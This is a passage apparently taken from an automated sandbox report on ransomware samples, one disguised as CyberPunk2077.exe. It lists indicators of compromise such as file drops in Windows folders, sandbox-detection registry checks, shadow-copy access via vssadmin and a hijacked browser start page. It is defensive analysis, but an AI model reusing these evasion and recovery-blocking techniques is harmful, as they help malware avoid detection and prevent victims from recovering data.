C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\SquareTile44x44.targetsize-48_altform-unplated_contrast-black_devicefamily-colorfulunplated.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare150x150.scale-125_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare44x44.targetsize-24_altform-unplated_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-unp_31bf3856ad364e35_10.0.19041.1266_none_21c0be7c0dad3632\f\UpdateNotificationMgr.exe CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-registry-editor_31bf3856ad364e35_10.0.19041.746_none_dc7caa836f08ad57\r\regedit.exe CyberPunk2077.exe File created C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-20_contrast-white.png CyberPunk2077.exe File created C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-256_altform-unplated_contrast-black.png CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\AppListIcon.targetsize-20.png CyberPunk2077.exe File created C:\Windows\WinSxS\x86_netfx4-ngen_exe_b03f5f7f11d50a3a_4.0.15805.0_none_faaa7cb4e8f21456\ngen.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.746_none_0b4ed891dd9ccbc8\Square44x44Logo.targetsize-24.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-dxp-deviceexperience_31bf3856ad364e35_10.0.19041.746_none_251e769058968366\settings.ico CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1_none_d0af17ec366548f3\splashscreen.contrast-white_scale-400.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_windows-defender-offline-amcore_31bf3856ad364e35_10.0.19041.1202_none_b9662ef4fe1412ad\f\OfflineScannerShell.exe CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-rasconnectionmanager_31bf3856ad364e35_10.0.19041.746_none_476e348ff3b593af\cmmon32.exe CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Ratings\RatingStars49.scale-200.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-hvsi-csp_31bf3856ad364e35_10.0.19041.844_none_c606f47e6aa94b5b\r\hvsievaluator.exe CyberPunk2077.exe File created C:\Windows\WinSxS\x86_netfx-aspnet_webadmin_images_b03f5f7f11d50a3a_10.0.19041.1_none_6fa7e5bbaa15a17d\ASPdotNET_logo.jpg CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Assets\PeopleLogo.targetsize-36_altform-unplated_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\breakpointUnbound.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\restore.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-tapicore_31bf3856ad364e35_10.0.19041.746_none_c2332356a565df1c\dialer.exe CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\square150x150logo.scale-200_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-filehistory-ui_31bf3856ad364e35_10.0.19041.746_none_2c2bcd67e9d4665c\r\FileHistory.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1202_none_8f7e37524c3e1a13\TinyTile.scale-125.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSplashScreen.scale-200_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-s..ast-white.searchapp_31bf3856ad364e35_10.0.19041.1_none_2f147508fcb33106\AppListIcon.scale-100.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.746_none_e6778e5b0114e5b0\KeyboardSystemToastIcon.contrast-white.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-a..-experience-apphelp_31bf3856ad364e35_10.0.19041.928_none_6012c8cabf808ff7\@AppHelpToast.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\headermaximize.png CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-web-app-host_31bf3856ad364e35_10.0.19041.789_none_1ab57d24625888e6\r\WWAHost.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSquare150x150Logo.scale-100_contrast-white.png CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_netfx4clientcorecomp.resources_31bf3856ad364e35_10.0.15805.0_de-de_d7f4b3c0973f3fda\SqlPersistenceService_Logic.sql CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-filepicker.appxmain_31bf3856ad364e35_10.0.19041.1023_none_374973298940e35c\SquareTile150x150.scale-200.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-pickerhost_31bf3856ad364e35_10.0.19041.1023_none_228521f0037fd996\r\PickerHost.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.19041.1_none_53ab1b93e0160a53\RpcPing.exe CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.19041.746_none_be3404fb0dff5d84\TSTheme.exe CyberPunk2077.exe File created C:\Windows\SystemResources\Windows.UI.AccountsControl\Images\Outlook.Theme-Dark_Scale-400.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare44x44.targetsize-64_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_netfx35linq-linqwebconfig_31bf3856ad364e35_10.0.19041.1_none_0cfdc32c8765ead4\LinqWebConfig.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-n..35cdfcomp.resources_31bf3856ad364e35_10.0.19041.1_ja-jp_3424e955efd79eef\DropSqlPersistenceProviderSchema.sql CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..-personalizationcsp_31bf3856ad364e35_10.0.19041.746_none_1eeb97b23978a488\desktopimgdownldr.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\WiFiNetworkManagerToast.scale-400.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-onecore-d..ectxdatabaseupdater_31bf3856ad364e35_10.0.19041.928_none_138fb436497565f4\directxdatabaseupdater.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.84_none_24f8aafdaceaf0b5\square44x44logo.scale-150_contrast-black.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-edp-task_31bf3856ad364e35_10.0.19041.1023_none_67d9ae9ccb89c9b7\@edptoastimage.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-xbox-gamecallableui.appxmain_31bf3856ad364e35_10.0.19041.746_none_0119299746221375\SplashScreen.scale-100.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_netfx-aspnet_state_exe_b03f5f7f11d50a3a_10.0.19041.1_none_fa5853083f6020df\aspnet_state.exe CyberPunk2077.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\SQL\es\DropSqlWorkflowInstanceStoreLogic.sql CyberPunk2077.exe File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\SQL\es\DropSqlWorkflowInstanceStoreSchema.sql CyberPunk2077.exe File created C:\Windows\SystemApps\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Assets\square44x44logo.scale-150_contrast-white.png CyberPunk2077.exe File created C:\Windows\SystemResources\Windows.SystemToast.Calling\Images\AnswerWithVideo.scale-150.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-u..te-musnotifyiconexe_31bf3856ad364e35_10.0.19041.1266_none_adfc223229a335a6\r\MusNotifyIcon.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.746_none_2b9acc2d69574796\Icon_MMXresume.contrast-white_scale-100.png CyberPunk2077.exe File created C:\Windows\ImmersiveControlPanel\images\wide.Apps.png CyberPunk2077.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x000a000000023b98-162.dat pyinstaller behavioral1/files/0x0008000000023d81-1799.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 5 IoCs
pid pid_target Process procid_target 2448 3448 WerFault.exe 124 5744 4292 WerFault.exe 156 6920 6876 WerFault.exe 161 5608 4292 WerFault.exe 156 7040 1824 WerFault.exe 115 -
System Location Discovery: System Language Discovery 1 TTPs 31 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CyberPunk2077.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 497D8E.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.nmxn-a7c1706b88b29404d24806876ad8b4473d2f515ea517605d8568c6f1c686b594.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CyberPunk2077.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gen.yfd-5dc8fd209538c67f0a27c941047bf4349354ca41bd2da45683890f0a2da9a7e6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Encoder-63764b471e90d681575d0acd501f8329d1b34b20e78c5d60930e6af3de3243be.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.GandCrypt.gen-e7f27619b2dbf3427639a1d821b12022544c4279c57079d8c06df8d276e47b0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-20371b37bbc403adb84e5f0896c843ea0c97cbed74362251a776f0f89b37e043.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CyberPunk2077.sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Blocker.gen-6e16a8eb2393714ab17c800d07663242aacb62a88e1044555271083b4a5c75b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crypren.ahis-b2b5e8fb5c54e5c723a95f61e9be0d5c6fdcb24f82d8698d8060ac34673b6e81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Encoder.ktf-559440f61d38495c433fea442a58b4831422d52a04da1ef7f8e43b17a736a8fd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csrss.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe -
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6872 vssadmin.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "www.2345.com/?k1902203" Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" csrss.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" csrss.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" csrss.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" csrss.exe Set value (str) 